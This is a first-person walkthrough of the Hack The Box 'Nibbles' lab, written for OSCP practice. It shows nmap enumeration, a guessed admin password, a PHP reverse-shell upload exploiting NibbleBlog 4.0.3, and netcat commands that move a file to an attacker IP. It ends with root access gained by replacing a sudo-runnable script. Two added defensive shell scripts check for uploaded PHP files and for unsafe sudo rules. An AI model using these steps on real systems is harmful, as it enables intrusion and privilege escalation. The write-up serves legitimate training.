Hackthebox NIBBLES Walkthrough (NO Metasploit) OSCP Prep.

Felix Meggison
Feb 20, 2021

Box Details

OS: Linux

Exploitable service: vulnerable web application and bad password

Difficulty: Easy

Estimated time: 1 hour 30 minutes

Note: This is an extensive walkthrough and covers my thought process.

Nmap Enumeration

Run an nmap scan to discover open ports.

nmap -sC -sV -A 10.10.10.75

This performs service version enumeration and runs the default scripts, traceroute, and OS enumeration.

The scan results show us that there are only 2 ports available, SSH on port 22 and Apache 2.4.18 on port 80. Normally I would check for the availability of a vulnerability in the service versions, but I decided to focus on the web server as it has a higher chance of giving initial access.

Just to confirm the open ports, I ran another nmap scan to check all ports. This came out the same as the other.

So it's time to enumerate the web server using a web browser. I visited the page and was presented with an almost empty web page that says “hello world!”.

So I checked the source code of the website with the key combination Ctrl + U. There are hints of a /nibbleblog directory in the source code.

So I visited the directory and it appears to be a blog.

I performed further enumeration of the page and had a theory this could involve some LFI or RFI.

After multiple trials, nothing came out, so I proceeded to do a directory brute force on the /nibbleblog directory.

Found some interesting directories, which led me further toward gaining access.

Visited the README file, which gave me more information about the blog.

Nibbleblog version 4.0.3 has a vulnerability in which an authenticated user uploads a malicious PHP file via a plugin and executes it. Read more about this at https://packetstormsecurity.com/files/133425/NibbleBlog-4.0.3-Shell-Upload.html .

But I had to obtain credentials to log in via the /admin.php page.

I decided to enumerate all discovered directories to find something useful. This took a lot of time, as I had to manually go through all the files in each directory. I found the username but no password.

Now I had the idea to immediately brute force the login page. Well, this was a bad idea.

My brute force attack was slow because I was using the community edition of Burp Suite (I wasted time on this because I tried multiple word lists), and I had to check the server responses to realize I was just wasting my time, as the web application had anti-brute-force protection.

I was perplexed: how was I to gain access to the box? In my opinion this was the hardest and most frustrating part of this box.

I resorted to password guessing and searching for a default password, which didn't exist. Well, it all ended when I asked a friend for help regarding this box and he was like “it's just in front of you” and “don't think outside the box”. A random trial of the box name as the password was all it took. The password was nibbles, which I found quite annoying.

So I wasted no time in gaining access; I followed the instructions from the vulnerability proof of concept.

So I uploaded a PHP shell file. You can get one from the pentestmonkey GitHub page: https://github.com/pentestmonkey/php-reverse-shell/blob/master/php-reverse-shell.php

Remember to change your attacking IP before uploading.

Ignore the warnings.

Navigate to /content/private/plugins/my_image to execute the PHP shell.

Click image.php and get a reverse shell. I hope you have a netcat listener already running?

We got a reverse shell as the nibbler user and we can read the user.txt file.
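
Seen from the defender's side, the image.php left under the plugin content directory is what gives this upload away. The sweep below is an added example, not part of the original walkthrough; the extension list and the sample directory layout are assumptions of the sketch.

```sh
#!/bin/sh
# Added example, not from the original post: sweep an upload or plugin content
# directory for files the web server could run as PHP. The extension list is
# an assumption of this sketch; adjust it to the server's handler mapping.

# Print "<reason> <file>" for each suspicious file under directory $1.
scan_upload_dir() {
    find "$1" -type f | while IFS= read -r f; do
        # Compare on a lower-cased name so IMAGE.PHP is caught as well.
        name=$(basename "$f" | tr '[:upper:]' '[:lower:]')
        case $name in
            *.php|*.php[0-9]|*.phtml|*.phar)
                echo "script-extension $f" ;;
            *)
                # Anything else in an upload directory should be plain data;
                # a PHP open tag inside it deserves a closer look.
                if grep -q '<?php' "$f"; then
                    echo "php-tag-in-data $f"
                fi ;;
        esac
    done
}
```

Run it against the web root's content directory, for example from a scheduled job, and alert on any output.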

There is also a personal.zip file in the nibbler home directory; we unzip it and see the contents.

There is a monitor.sh script which belongs to the nibbler user.

Next I try to run the script to see what it does. It seems like a script that does some monitoring on the host.

Next I try to exfiltrate/transfer the script via netcat and examine it.

On the victim, run nc 10.10.14.5 2021 < monitor.sh

On the attacking machine, run nc -lvnp 2021 > monitor.sh

I find something suspicious in the script. It seems it's executing something as root, and this prompts me to run sudo -l immediately. I realized this was a simple privilege escalation.

It appears I can run the script monitor.sh as root, and since it belongs to the nibbler user I can edit the contents or probably replace it with something malicious.
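
The misconfiguration here is a sudo rule that points at a file root does not control. The audit below is an added example, not part of the original walkthrough: it reads `sudo -l` style output and reports every allowed command whose file or parent directory is missing, not owned by the trusted UID, or group/world-writable. It assumes GNU stat; TRUSTED_UID and the function names are the sketch's own.

```sh
#!/bin/sh
# Added example, not from the original post: audit `sudo -l` style rules for
# commands that an account other than root could edit or replace.
# Assumes GNU stat. TRUSTED_UID is this sketch's own knob (default 0 = root).

# Print one reason per line if $1 (a file or directory) is not root-controlled.
unsafe_reasons() {
    target=$1
    if [ ! -e "$target" ]; then
        echo "missing"
        return 0
    fi
    uid=$(stat -L -c %u "$target")       # -L: judge what a symlink points to
    mode=$(stat -L -c %a "$target")      # octal permission bits, e.g. 755
    if [ "$uid" != "${TRUSTED_UID:-0}" ]; then echo "owned-by-uid-$uid"; fi
    if [ $(( 0$mode & 022 )) -ne 0 ]; then echo "group-or-world-writable"; fi
}

# Extract the command path from each "(runas) [TAG:] /path [args], ..." line.
sudo_rule_paths() {
    awk '/^[ \t]*\(/ {
        sub(/^[ \t]*\([^)]*\)[ \t]*/, "")
        n = split($0, cmds, ",")
        for (i = 1; i <= n; i++) {
            m = split(cmds[i], w, /[ \t]+/)
            for (j = 1; j <= m; j++)
                if (w[j] ~ /^\//) { print w[j]; break }
        }
    }'
}

# Read `sudo -l` output on stdin; print "RISK <path> <file|parent>:<reason>".
audit_sudo_rules() {
    sudo_rule_paths | while IFS= read -r path; do
        unsafe_reasons "$path" | while IFS= read -r r; do
            echo "RISK $path file:$r"
        done
        # A writable parent lets a user swap in a new file of the same name.
        unsafe_reasons "$(dirname "$path")" | while IFS= read -r r; do
            echo "RISK $path parent:$r"
        done
    done
}
```

Feed it the output of `sudo -l -U <account>` for each account; any RISK line means the rule should point at a root-owned file in a root-owned directory instead.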

So I removed the existing monitor.sh script and replaced it with one I created on my Kali machine to run bash. You could improvise on this and use a reverse bash shell script.

So I transferred a malicious shell back to the victim via netcat and my reverse shell got stuck. So I’ll relaunch it and hope it's there lol! You might want to use wget and a Python HTTP server to transfer files.

I got another shell back and tried to run the script.

It didn’t work, so I had to make it executable with chmod +x monitor.sh

Finally we are root! It was an annoying box but easy.

Thanks for reading. Many box write-ups are upcoming.

Felix Meggison

I'm a cyber security analyst who wants to be a Professional penetration tester. Currently working on getting my OSCP certification.